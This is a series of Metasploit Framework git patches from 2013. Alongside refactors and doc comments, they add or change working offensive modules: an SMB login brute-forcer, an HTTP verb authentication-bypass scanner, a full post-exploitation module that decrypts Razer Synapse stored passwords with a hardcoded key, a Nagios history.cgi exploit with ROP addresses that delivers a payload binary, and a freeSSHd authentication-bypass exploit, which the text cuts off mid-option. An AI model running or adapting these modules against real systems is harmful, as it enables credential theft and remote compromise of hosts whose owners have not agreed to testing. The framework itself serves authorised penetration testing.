changed, 39 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 413d1e521f81..d5c481e7cef7 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -41,6 +41,7 @@ def initialize(framework, pinst, reqs) # This method generates the full encoded payload and returns the encoded # payload buffer. # + # @return [String] The encoded payload. def generate(raw = nil) self.raw = raw self.encoded = nil @@ -86,8 +87,9 @@ def generate(raw = nil) # # Generates the raw payload from the payload instance. This populates the - # raw attribute. + # {#raw} attribute. # + # @return [String] The raw, unencoded payload. def generate_raw self.raw = (reqs['Prepend'] || '') + pinst.generate + (reqs['Append'] || '') @@ -216,7 +218,7 @@ def encode # If the encoded payload is nil, raise an exception saying that we # suck at life. if (self.encoded == nil) - encoder = nil + self.encoder = nil raise NoEncodersSucceededError, "#{pinst.refname}: All encoders failed to encode.", diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 7a66ae32038f..60f46a0e7c8c 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -30,6 +30,9 @@ def payload_type # # Return the stager payload's raw payload. # + # Can be nil if the stager is not pre-assembled. + # + # @return [String,nil] def payload return module_info['Stager']['Payload'] end @@ -37,6 +40,7 @@ def payload # # Return the stager payload's assembly text, if any. # + # @return [String,nil] def assembly return module_info['Stager']['Assembly'] end @@ -44,6 +48,9 @@ def assembly # # Return the stager payload's offsets. # + # These will be used for substitutions during stager generation. + # + # @return [Hash] def offsets return module_info['Stager']['Offsets'] end @@ -51,6 +58,9 @@ def offsets # # Returns the raw stage payload. # + # Can be nil if the final stage is not pre-assembled. + # + # @return [String,nil] def stage_payload return module_info['Stage']['Payload'] end @@ -58,6 +68,7 @@ def stage_payload # # Returns the assembly text of the stage payload. # + # @return [String] def stage_assembly return module_info['Stage']['Assembly'] end @@ -65,6 +76,10 @@ def stage_assembly # # Returns variable offsets within the stage payload. # + # These will be used for substitutions during generation of the final + # stage. + # + # @return [Hash] def stage_offsets return module_info['Stage']['Offsets'] end @@ -77,6 +92,11 @@ def stage_over_connection? true end + + # + # Whether to use an Encoder on the second stage + # + # @return [Boolean] def encode_stage? # Convert to string in case it hasn't been normalized !!(datastore['EnableStageEncoding'].to_s == "true") @@ -85,6 +105,7 @@ def encode_stage? # # Generates the stage payload and substitutes all offsets. # + # @return [String] The generated payload stage, as a string. def generate_stage # Compile the stage as necessary p = build(stage_payload, stage_assembly, stage_offsets, '-stg1') @@ -92,21 +113,23 @@ def generate_stage # Substitute variables in the stage substitute_vars(p, stage_offsets) if (stage_offsets) - # Encode the stage if stage encoding is enabled - p = encode_stage(p) - return p end # # Transmit the associated stage. # + # @param (see handle_connection_stage) + # @return (see handle_connection_stage) def handle_connection(conn, opts={}) # If the stage should be sent over the client connection that is # established (which is the default), then go ahead and transmit it. if (stage_over_connection?) p = generate_stage + # Encode the stage if stage encoding is enabled + p = encode_stage(p) + # Give derived classes an opportunity to an intermediate state before # the stage is sent. This gives derived classes an opportunity to # augment the stage and the process through which it is read on the @@ -146,10 +169,15 @@ def handle_connection(conn, opts={}) end # - # Called by handle_connection to allow the stage to process - # whatever it is it needs to process. The default is to simply attempt to - # create a session. + # Allow the stage to process whatever it is it needs to process. + # + # Override to deal with sending the final stage in cases where + # {#generate_stage} is not the whole picture, such as when uploading + # an executable. The default is to simply attempt to create a session + # on the given +conn+ socket with {Handler#create_session}. # + # @param (see Handler#create_session) + # @return (see Handler#create_session) def handle_connection_stage(conn, opts={}) create_session(conn, opts) end @@ -180,6 +208,7 @@ def encode_stage(stg) 'Encoder' => stage_enc_mod, 'SaveRegisters' => ['edi'], 'ForceEncode' => true) + print_status("Encoded stage with #{encp.encoder.refname}") # If the encoding succeeded, use the encoded buffer. Otherwise, fall # back to using the non-encoded stage From a06d49a8be07d235756f39a228500de546d840f1 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 11:25:02 -0600 Subject: [PATCH 030/421] Return symbols STOP_ON_SUCCESS is being ignored because the module's login function doesn't pass a symbol to the mixin. This addresses that. --- modules/auxiliary/scanner/smb/smb_login.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 9e5c7e334577..269e569fd8b4 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -215,10 +215,15 @@ def try_user_pass(domain, user, pass) print_status(output_message % "GUEST LOGIN") end end + + return :next_user + when *@correct_credentials_status_codes print_status(output_message % "FAILED LOGIN, VALID CREDENTIALS" ) report_creds(domain,user,pass,false) validuser_case_sensitive?(domain, user, pass) + return :skip_user + when 'STATUS_LOGON_FAILURE', 'STATUS_ACCESS_DENIED' vprint_error(output_message % "FAILED LOGIN") else From 6e6e90d7331c70bdd27fd8b35b74e043f4c0df6b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 11:36:49 -0600 Subject: [PATCH 031/421] Cosmetic changes --- modules/auxiliary/scanner/smb/smb_login.rb | 63 ++++++++++++---------- 1 file changed, 35 insertions(+), 28 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 269e569fd8b4..767a140d1ee4 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -31,10 +31,11 @@ def initialize and connected to a database this module will record successful logins and hosts so you can track your access. }, - 'Author' => [ - 'tebo ', # Original - 'Ben Campbell ' # Refactoring - ], + 'Author' => + [ + 'tebo ', # Original + 'Ben Campbell ' # Refactoring + ], 'References' => [ [ 'CVE', '1999-0506'], # Weak password @@ -45,15 +46,18 @@ def initialize deregister_options('RHOST','USERNAME','PASSWORD') @accepts_guest_logins = {} - @correct_credentials_status_codes = ["STATUS_INVALID_LOGON_HOURS", - "STATUS_INVALID_WORKSTATION", - "STATUS_ACCOUNT_RESTRICTION", - "STATUS_ACCOUNT_EXPIRED", - "STATUS_ACCOUNT_DISABLED", - "STATUS_ACCOUNT_RESTRICTION", - "STATUS_PASSWORD_EXPIRED", - "STATUS_PASSWORD_MUST_CHANGE", - "STATUS_LOGON_TYPE_NOT_GRANTED"] + + @correct_credentials_status_codes = [ + "STATUS_INVALID_LOGON_HOURS", + "STATUS_INVALID_WORKSTATION", + "STATUS_ACCOUNT_RESTRICTION", + "STATUS_ACCOUNT_EXPIRED", + "STATUS_ACCOUNT_DISABLED", + "STATUS_ACCOUNT_RESTRICTION", + "STATUS_PASSWORD_EXPIRED", + "STATUS_PASSWORD_MUST_CHANGE", + "STATUS_LOGON_TYPE_NOT_GRANTED" + ] # These are normally advanced options, but for this module they have a # more active role, so make them regular options. @@ -63,7 +67,7 @@ def initialize OptString.new('SMBUser', [ false, "SMB Username" ]), OptString.new('SMBDomain', [ false, "SMB Domain", '']), OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true]), - OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false]), + OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false]) ], self.class) end @@ -98,19 +102,22 @@ def check_login_status(domain, user, pass) connect() status_code = "" begin - simple.login( datastore['SMBName'], - user, - pass, - domain, - datastore['SMB::VerifySignature'], - datastore['NTLM::UseNTLMv2'], - datastore['NTLM::UseNTLM2_session'], - datastore['NTLM::SendLM'], - datastore['NTLM::UseLMKey'], - datastore['NTLM::SendNTLM'], - datastore['SMB::Native_OS'], - datastore['SMB::Native_LM'], - {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}) + simple.login( + datastore['SMBName'], + user, + pass, + domain, + datastore['SMB::VerifySignature'], + datastore['NTLM::UseNTLMv2'], + datastore['NTLM::UseNTLM2_session'], + datastore['NTLM::SendLM'], + datastore['NTLM::UseLMKey'], + datastore['NTLM::SendNTLM'], + datastore['SMB::Native_OS'], + datastore['SMB::Native_LM'], + {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + ) + # Windows SMB will return an error code during Session Setup, but nix Samba requires a Tree Connect: simple.connect("\\\\#{datastore['RHOST']}\\IPC$") status_code = 'STATUS_SUCCESS' @@ -212,7 +219,7 @@ def try_user_pass(domain, user, pass) print_status(output_message % "GUEST LOGIN") report_creds(domain,user,pass,true) elsif datastore['VERBOSE'] - print_status(output_message % "GUEST LOGIN") + print_status(output_message % "GUEST LOGIN") end end From 4883cf4b01af4c64778d0cb84781fb13978e2a5f Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Jan 2013 12:49:43 -0600 Subject: [PATCH 032/421] Minor doc comment additions --- lib/msf/core/payload/stager.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 60f46a0e7c8c..c8db9f84627f 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -174,7 +174,7 @@ def handle_connection(conn, opts={}) # Override to deal with sending the final stage in cases where # {#generate_stage} is not the whole picture, such as when uploading # an executable. The default is to simply attempt to create a session - # on the given +conn+ socket with {Handler#create_session}. + # on the given +conn+ socket with {Msf::Handler#create_session}. # # @param (see Handler#create_session) # @return (see Handler#create_session) @@ -191,6 +191,7 @@ def handle_intermediate_stage(conn, payload) end # Encodes the stage prior to transmission + # @return [String] Encoded version of +stg+ def encode_stage(stg) return stg unless encode_stage? From 5109cc97feb664d3dde35ae32a2260671cafb42d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 14:11:53 -0600 Subject: [PATCH 033/421] Add more verbs [SeeRM: #7138] by jabra --- modules/auxiliary/scanner/http/verb_auth_bypass.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 94739be2256b..4cf89e603f7b 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -42,7 +42,9 @@ def run_host(ip) 'HEAD', 'TRACE', 'TRACK', - 'Wmap' + 'Wmap', + 'get', + 'trace' ] From 9dc42e93e77ca800c99c67cb76fbf0dff85fee39 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jan 2013 14:36:41 -0600 Subject: [PATCH 034/421] Reduce unnecessary indent level --- .../scanner/http/verb_auth_bypass.rb | 125 +++++++++--------- 1 file changed, 60 insertions(+), 65 deletions(-) diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 4cf89e603f7b..a91a2a02f530 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -8,7 +8,6 @@ require 'msf/core' - class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first @@ -21,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'HTTP Verb Authentication Bypass Scanner', - 'Description' => %q{ + 'Name' => 'HTTP Verb Authentication Bypass Scanner', + 'Description' => %q{ This module test for authentication bypass using different HTTP verbs. }, - 'Author' => [ 'et [at] metasploit.com' ], - 'License' => BSD_LICENSE)) + 'Author' => [ 'et [at] metasploit.com' ], + 'License' => BSD_LICENSE)) register_options( [ @@ -35,74 +34,70 @@ def initialize(info = {}) ], self.class) end - # Fingerprint a single host def run_host(ip) + begin + test_verbs(ip) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end - verbs = [ - 'HEAD', - 'TRACE', - 'TRACK', - 'Wmap', - 'get', - 'trace' - ] + def test_verbs(ip) + verbs = [ 'HEAD', 'TRACE', 'TRACK', 'Wmap', 'get', 'trace' ] + res = send_request_raw({ + 'uri' => normalize_uri(datastore['PATH']), + 'method' => 'GET' + }, 10) - begin - res = send_request_raw({ + return if not res + + if not res.headers['WWW-Authenticate'] + print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}") + return + end + + auth_code = res.code + + print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]") + + report_note( + :host => ip, + :proto => 'tcp', + :sname => (ssl ? 'https' : 'http'), + :port => rport, + :type => 'WWW_AUTHENTICATE', + :data => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}", + :update => :unique_data + ) + + verbs.each do |tv| + resauth = send_request_raw({ 'uri' => normalize_uri(datastore['PATH']), - 'method' => 'GET' + 'method' => tv }, 10) - if res - - auth_code = res.code - - if res.headers['WWW-Authenticate'] - print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]") - - report_note( - :host => ip, - :proto => 'tcp', - :sname => (ssl ? 'https' : 'http'), - :port => rport, - :type => 'WWW_AUTHENTICATE', - :data => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}", - :update => :unique_data - ) - - verbs.each do |tv| - resauth = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']), - 'method' => tv - }, 10) - - if resauth - print_status("Testing verb #{tv} resp code: [#{resauth.code}]") - if resauth.code != auth_code and resauth.code <= 302 - print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}") - - # Unable to use report_web_vuln as method is not in list of allowed methods. - - report_note( - :host => ip, - :proto => 'tcp', - :sname => (ssl ? 'https' : 'http'), - :port => rport, - :type => 'AUTH_BYPASS_VERB', - :data => "#{datastore['PATH']} Verb: #{tv}", - :update => :unique_data - ) - - end - end - end - else - print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}") - end + next if not resauth + + print_status("Testing verb #{tv}, resp code: [#{resauth.code}]") + + if resauth.code != auth_code and resauth.code <= 302 + print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}") + + # Unable to use report_web_vuln as method is not in list of allowed methods. + + report_note( + :host => ip, + :proto => 'tcp', + :sname => (ssl ? 'https' : 'http'), + :port => rport, + :type => 'AUTH_BYPASS_VERB', + :data => "#{datastore['PATH']} Verb: #{tv}", + :update => :unique_data + ) end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE end end + end + From 2ee0c0d8fb9bc33dab04ccd736716e28a35aa06d Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Jan 2013 16:59:01 -0600 Subject: [PATCH 035/421] Add simple specs for Rex::Encoding::Xor* --- spec/lib/rex/encoding/xor/byte.rb | 7 +++++++ spec/lib/rex/encoding/xor/dword.rb | 7 +++++++ spec/lib/rex/encoding/xor/qword.rb | 7 +++++++ spec/lib/rex/encoding/xor/word.rb | 7 +++++++ spec/support/shared/examples/xor_encoder.rb | 20 ++++++++++++++++++++ 5 files changed, 48 insertions(+) create mode 100644 spec/lib/rex/encoding/xor/byte.rb create mode 100644 spec/lib/rex/encoding/xor/dword.rb create mode 100644 spec/lib/rex/encoding/xor/qword.rb create mode 100644 spec/lib/rex/encoding/xor/word.rb create mode 100644 spec/support/shared/examples/xor_encoder.rb diff --git a/spec/lib/rex/encoding/xor/byte.rb b/spec/lib/rex/encoding/xor/byte.rb new file mode 100644 index 000000000000..03dae077215b --- /dev/null +++ b/spec/lib/rex/encoding/xor/byte.rb @@ -0,0 +1,7 @@ + +require 'rex/encoding/xor/byte' +require 'spec_helper' + +describe Rex::Encoding::Xor::Byte do + it_behaves_like "an xor encoder", 1 +end diff --git a/spec/lib/rex/encoding/xor/dword.rb b/spec/lib/rex/encoding/xor/dword.rb new file mode 100644 index 000000000000..353909385549 --- /dev/null +++ b/spec/lib/rex/encoding/xor/dword.rb @@ -0,0 +1,7 @@ + +require 'rex/encoding/xor/dword' +require 'spec_helper' + +describe Rex::Encoding::Xor::Dword do + it_behaves_like "an xor encoder", 4 +end diff --git a/spec/lib/rex/encoding/xor/qword.rb b/spec/lib/rex/encoding/xor/qword.rb new file mode 100644 index 000000000000..12ae6f6cd381 --- /dev/null +++ b/spec/lib/rex/encoding/xor/qword.rb @@ -0,0 +1,7 @@ + +require 'rex/encoding/xor/qword' +require 'spec_helper' + +describe Rex::Encoding::Xor::Qword do + it_behaves_like "an xor encoder", 8 +end diff --git a/spec/lib/rex/encoding/xor/word.rb b/spec/lib/rex/encoding/xor/word.rb new file mode 100644 index 000000000000..78284b96d5c5 --- /dev/null +++ b/spec/lib/rex/encoding/xor/word.rb @@ -0,0 +1,7 @@ + +require 'rex/encoding/xor/word' +require 'spec_helper' + +describe Rex::Encoding::Xor::Word do + it_behaves_like "an xor encoder", 2 +end diff --git a/spec/support/shared/examples/xor_encoder.rb b/spec/support/shared/examples/xor_encoder.rb new file mode 100644 index 000000000000..df9cd08c9ae6 --- /dev/null +++ b/spec/support/shared/examples/xor_encoder.rb @@ -0,0 +1,20 @@ +shared_examples_for 'an xor encoder' do |keysize| + + it "should encode one block" do + # Yup it returns one of its arguments in an array... Because spoon. + encoded, key = described_class.encode("A"*keysize, "A"*keysize) + encoded.should eql("\x00"*keysize) + + encoded, key = described_class.encode("\x0f"*keysize, "\xf0"*keysize) + encoded.should eql("\xff"*keysize) + + encoded, key = described_class.encode("\xf7"*keysize, "\x7f"*keysize) + encoded.should eql("\x88"*keysize) + end + + it "should encode multiple blocks" do + encoded, key = described_class.encode("\xf7"*keysize*40, "\x7f"*keysize) + encoded.should eql("\x88"*keysize*40) + end + +end From b2cd65e28312d5e9b49d2701f693ac3a54d9e498 Mon Sep 17 00:00:00 2001 From: smilingraccoon Date: Tue, 15 Jan 2013 21:14:49 -0500 Subject: [PATCH 036/421] adding razer_synapse.rb --- .../gather/credentials/razer_synapse.rb | 119 ++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 modules/post/windows/gather/credentials/razer_synapse.rb diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb new file mode 100644 index 000000000000..c86f1b9c0aa1 --- /dev/null +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -0,0 +1,119 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/windows/user_profiles' +require 'openssl' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Razer Synapse Password Extraction', + 'Description' => %q{ + This module will enumerate passwords stored by the Razer Synapse + client. The encryption key and iv is publicly known. This module + will not only extract encrypted password but will also decrypt + password using public key. Affects version 1.7.15 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Thomas McCarthy "smilingraccoon" ', + 'Matt Howard "pasv" ', #PoC + 'Brandon McCann "zeknox" ' + ], + 'SessionTypes' => [ 'meterpreter' ], + 'Platform' => [ 'win' ], + + )) + end + + # decrypt password + def decrypt(hash) + cipher = OpenSSL::Cipher::Cipher.new 'aes-256-cbc' + cipher.decrypt + cipher.key = "hcxilkqbbhczfeultgbskdmaunivmfuo" + cipher.iv = "ryojvlzmdalyglrj" + + hash.each_pair { |user,pass| + pass = pass.unpack("m")[0] + + password = cipher.update pass + password << cipher.final rescue return nil + + store_creds(user, password.split("||")[1]) + print_good("Found credentials") + print_good("\tUser: #{user}") + print_good("\tPassword: #{password.split("||")[1]}") + } + end + + def store_creds(user, pass) + if db + report_auth_info( + :host => client.sock.peerhost, + :port => 443, + :ptype => 'password', + :sname => 'razer_synapse', + :user => user, + :pass => pass, + :duplicate_ok => true, + :active => true + ) + vprint_status("Loot stored in the db") + end + end + + # Loop throuhg config, grab user and pass + def parse_config(config) + if not config =~ /\d<\/Version>/ + creds = {} + cred_group = config.split("") + cred_group.each { |cred| + user = /([^<]+)<\/Username>/.match(cred) + pass = /([^<]+)<\/Password>/.match(cred) + if user and pass + creds[user[1]] = pass[1] + end + } + return creds + else + print_error("Module only works against configs from version < 1.7.15") + return nil + end + end + + # main control method + def run + grab_user_profiles().each do |user| + if user['LocalAppData'] + accounts = user['LocalAppData'] + "\\Razer\\Synapse\\Accounts\\RazerLoginData.xml" + # open the file for reading + config = client.fs.file.new(accounts, 'r') rescue nil + next if config.nil? + print_status("Config found for user #{user['UserName']}") + + contents = config.read + config.close + + # read the contents of file + creds = parse_config(contents) + if creds + decrypt(creds) + else + print_error("Could not read config or empty for #{user['UserName']}") + end + end + end + end +end \ No newline at end of file From 12e7949183d0e6a15ec43fc3decd73a01657d80f Mon Sep 17 00:00:00 2001 From: smilingraccoon Date: Tue, 15 Jan 2013 21:23:49 -0500 Subject: [PATCH 037/421] msftidy change --- modules/post/windows/gather/credentials/razer_synapse.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index c86f1b9c0aa1..96f94572968e 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -23,7 +23,7 @@ def initialize(info={}) This module will enumerate passwords stored by the Razer Synapse client. The encryption key and iv is publicly known. This module will not only extract encrypted password but will also decrypt - password using public key. Affects version 1.7.15 and earlier. + password using public key. Affects version 1.7.15 and earlier. }, 'License' => MSF_LICENSE, 'Author' => @@ -33,7 +33,7 @@ def initialize(info={}) 'Brandon McCann "zeknox" ' ], 'SessionTypes' => [ 'meterpreter' ], - 'Platform' => [ 'win' ], + 'Platform' => [ 'win' ], )) end From 064ea63a72b9fa0ade441ff77a29b1226826a879 Mon Sep 17 00:00:00 2001 From: Jose Selvi Date: Wed, 16 Jan 2013 05:22:43 +0100 Subject: [PATCH 038/421] Fixes --- .../unix/webapp/nagios3_history_cgi.rb | 143 ++++++++++++------ 1 file changed, 93 insertions(+), 50 deletions(-) diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index c8c0cfb39f94..a1e61e57c68e 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -30,11 +30,14 @@ def initialize(info = {}) 'References' => [ [ 'CVE', '2012-6096' ], + [ 'OSVDB', '88322' ], + [ 'BID', '56879' ], + [ 'EDB', '24084' ], [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ], [ 'URL', 'http://pastebin.com/FJUNyTaj' ], ], 'Platform' => ['unix', 'linux'], - 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'Arch' => [ ARCH_X86 ], 'Privileged' => false, 'Payload' => { @@ -45,10 +48,10 @@ def initialize(info = {}) [ [ 'Automatic Target', { 'auto' => true }], # NOTE: All addresses are from the history.cgi binary - [ 'CentOS (nagios-3.4.3-1.el6.i686.rpm)', + [ 'Appliance Nagios XI 2012R1.3 (CentOS 6.x)', { - 'BannerRE' => 'CentOS', - 'VersionRE' => '3.4.3', + 'BannerRE' => 'Apache/2.2.15 (CentOS)', + 'VersionRE' => '3.4.1', 'Arch' => ARCH_X86, 'Offset' => 0xc43, 'RopStack' => @@ -62,7 +65,7 @@ def initialize(info = {}) ] } ], - [ 'Debian (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. + [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)', # From original exploit. Not tested. { 'BannerRE' => 'Debian', 'VersionRE' => '3.3.0', @@ -70,12 +73,12 @@ def initialize(info = {}) 'Offset' => 0xc37, 'RopStack' => [ - 0x0804b620, # unescape_cgi_input() - 0x08048fe4, # pop, ret - 0x080727a0, # buffer addr - 0x08048c7c, # system() - 0xdeafbabe, # if should be exit() but it's not - 0x080727a0 # buffer addr + 0x0804b620, # unescape_cgi_input() + 0x08048fe4, # pop, ret + 0x080727a0, # buffer addr + 0x08048c7c, # system() + 0xdeafbabe, # if should be exit() but it's not + 0x080727a0 # buffer addr ] } ], @@ -85,20 +88,29 @@ def initialize(info = {}) register_options( [ - OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), - OptString.new('USER', [false, "The username to authenticate with", "guest"]), - OptString.new('PASS', [false, "The password to authenticate with", "guest"]), + OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), + OptString.new('USER', [false, "The username to authenticate with", "nagiosadmin"]), + OptString.new('PASS', [false, "The password to authenticate with", "nagiosadmin"]), ], self.class) end def detect_version(uri) # Send request - res = send_request_raw({ - 'uri' => uri, - 'method' => 'GET', - }, 90) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri, + 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, + }, 10) - # Detection unknown if error + # Error handling + if(res.code == 401) + print_error("Please specify correct values for USER and PASS") + return nil, nil + end + if(res.code == 404) + print_error("Please specify the correct path to history.cgi in the URI parameter") + return nil, nil + end if res.nil? print_error("Unable to get a response from the server") return nil, nil @@ -107,46 +119,74 @@ def detect_version(uri) # Extract banner from response banner = res.headers['Server'] - # Version undetected by now - String = "Nagios® Core™ 3.4.1 -" + # Extract version from body version = nil + version_line = res.body.match(/Nagios® Core™ [0-9.]+ -/) + if not version_line.nil? + version = version_line[0].match(/[0-9.]+/)[0] + end + + # Check in an alert exists + alert = res.body.match(/ALERT/) - return version, banner + return version, banner, alert end - def exploit - uri = normalize_uri(datastore['URI']) + def select_target(version, banner) + # Get version information + if not banner.nil? + print_status("Web Server banner: #{banner}") + end + if not version.nil? + print_status("Nagios version detected: #{version}") + end - # Automatic Targeting - mytarget = nil - if (target['auto']) - print_status("Automatically detecting the target...") + # No banner and version, no target + if banner.nil? or version.nil? + return nil + end - # Get version information - version, banner = detect_version(uri) - if not banner.nil? - print_status("Web Server banner: #{banner}") + # Try regex for each target + self.targets.each do |t| + if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target + next end - if not version.nil? - print_status("Nagios version detected: #{version}") + regexp1 = Regexp.escape(t['BannerRE']) + regexp2 = Regexp.escape(t['VersionRE']) + if ( banner =~ /#{regexp1}/ and version =~ /#{regexp2}/ ) then + return t end + end + # If not detected, return nil + return nil + end - # No banner, no target - if banner.nil? - fail_with(Exploit::Failure::NoTarget, "No matching target") - end + def check + print_status("Checking banner and version...") + # Detect version + banner, version, alert = detect_version(target_uri.path) + # Select target + mytarget = select_target(banner, version) - # Try regex for each target - self.targets.each do |t| - if t['BannerRE'].nil? # It doesn't exist in Auto Target - next - end - regexp = Regexp.escape(t['BannerRE']) - if ( banner =~ /#{regexp}/ ) then - mytarget = t - break - end - end + if mytarget.nil? + print_error("No matching target") + return CheckCode::Unknown + end + if alert.nil? + print_error("At least one ALERT is needed in order to exploit") + return CheckCode::Safe + end + return CheckCode::Vulnerable + end + + def exploit + # Automatic Targeting + mytarget = nil + if (target['auto']) + print_status("Automatically detecting the target...") + banner, version, alert = detect_version(target_uri.path) + mytarget = select_target(banner, version) if mytarget.nil? fail_with(Exploit::Failure::NoTarget, "No matching target") end @@ -155,7 +195,10 @@ def exploit end print_status("Selected Target: #{mytarget.name}") - print_status("Sending request to http://#{rhost}:#{rport}#{uri}") + if alert and alert.nil? + fail_with(Exploit::Failure::NoTarget, "At least one ALERT is needed in order to exploit") + end + print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}") # Generate a payload ELF to execute elfbin = generate_payload_exe @@ -178,7 +221,7 @@ def exploit # Send exploit res = send_request_cgi({ 'method' => 'GET', - 'uri' => uri, + 'uri' => target_uri.path, 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") }, 'vars_get' => { From 0f24671cf7a1a353bd3456e9c69fd59dbdacaf69 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 16 Jan 2013 02:14:52 -0600 Subject: [PATCH 039/421] Changes how the usernames are loaded. Allows usernames to be loaded as a file (wordlist), that way the it's much easier to manage. It defaults to unix_users.txt, because these usernames are common in any SSH hosts out there. If the user only wants to try a specific user (which is better, because you reduce traffic noise that way), then he/she can set the USERNAME option, and that should be the only one tried -- similar to how AuthBrute behaves. I also fixed the regex in check(). --- .../windows/ssh/freesshd_authbypass.rb | 65 ++++++++++++++----- 1 file changed, 50 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 1bf45ab16f90..4e667138fe53 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -1,6 +1,12 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' -require 'tempfile' + class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -42,9 +48,16 @@ def initialize(info={}) register_options( [ - OptInt.new('RPORT', [false, 'The target port', 22]), - OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator']) + Opt::RPORT(22), + OptString.new('USERNAME', [false, 'A specific username to try']), + OptPath.new( + 'USER_FILE', 